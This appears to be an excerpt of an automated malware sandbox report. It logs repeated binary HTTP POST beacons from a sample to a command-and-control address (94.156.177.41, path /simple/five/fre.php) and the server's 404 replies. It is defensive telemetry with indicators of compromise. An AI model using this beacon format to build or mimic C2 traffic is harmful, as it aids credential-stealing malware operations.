                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_00404ED4 recv,0_2_00404ED4
                      Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 180Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
